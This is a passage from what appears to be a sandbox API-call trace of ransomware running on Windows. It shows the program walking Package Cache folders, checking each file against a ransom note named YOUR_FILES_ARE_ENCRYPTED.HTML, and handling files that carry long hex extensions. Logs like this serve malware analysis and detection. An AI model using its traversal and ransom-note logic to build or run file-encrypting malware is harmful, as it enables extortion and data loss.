cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.183] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.183] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.183] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.183] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.183] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.183] GetProcessHeap () returned 0x270000 [0170.184] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.184] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0170.184] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 86 [0170.184] GetProcessHeap () returned 0x270000 [0170.184] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.184] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0170.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*" [0170.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.184] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.185] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.185] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 95 [0170.185] GetProcessHeap () returned 0x270000 [0170.185] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.185] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0170.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*" [0170.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.185] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.185] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.185] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 116 [0170.185] GetProcessHeap () returned 0x270000 [0170.185] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.185] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0170.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*" [0170.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf833b400, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xf833b400, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xccca7dc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65", cAlternateFileName="CAB1CA~1.D11")) returned 1 [0170.186] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned 190 [0170.186] lstrcmpW (lpString1="cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.186] PathFindExtensionW (pszPath="cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned=".D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65" [0170.186] lstrlenW (lpString=".D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned 65 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.186] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 142 [0170.186] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.186] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.186] lstrlenW (lpString=".msi") returned 4 [0170.186] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb51160, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb51160, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.186] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.186] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb51160, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb51160, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.186] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.187] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.187] GetProcessHeap () returned 0x270000 [0170.187] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.188] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc359a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.188] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.188] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.188] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc359a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.188] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.188] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.188] GetProcessHeap () returned 0x270000 [0170.189] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.189] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.189] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.189] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.189] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.189] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.189] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.189] GetProcessHeap () returned 0x270000 [0170.190] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.190] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccccdf20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0170.190] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 75 [0170.191] GetProcessHeap () returned 0x270000 [0170.191] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.191] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0170.191] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*" [0170.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccccdf20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.191] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccccdf20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.191] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1780ae70, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1aaa01f0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0170.191] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 85 [0170.191] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.191] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.191] lstrlenW (lpString=".rsm") returned 4 [0170.191] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.191] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 